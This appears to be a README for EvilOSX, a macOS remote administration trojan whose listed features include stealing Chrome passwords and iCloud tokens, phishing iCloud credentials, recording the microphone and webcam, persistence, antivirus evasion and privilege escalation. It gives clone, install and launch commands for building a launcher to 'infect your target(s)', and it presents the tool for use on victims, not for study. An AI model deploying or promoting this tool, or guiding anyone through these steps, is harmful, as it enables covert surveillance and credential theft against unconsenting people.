An evil RAT (Remote Administration Tool) for macOS / OS X.
Features
- Emulate a terminal instance
- Simple extendable module system
- No bot dependencies (pure python)
- Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
- Persistent
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history (Chrome and Safari)
- Phish for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation
How To Use
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
# Go into the repository
$ cd EvilOSX
# Install dependencies required by the server
$ sudo pip install -r requirements.txt
# Start the GUI
$ python start.py
# Lastly, run a built launcher on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.
Advanced users
There's also a CLI for those who want to use this over SSH:
# Create a launcher to infect your target(s)
$ python start.py --builder
# Start the CLI
$ python start.py --cli --port 1337
# Lastly, run a built launcher on your target(s)
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> </svg>
Screenshots
EvilOSX - pure python, post-exploitation, RAT
- https://github.com/Marten4n6/EvilOSX
*Beware click the link!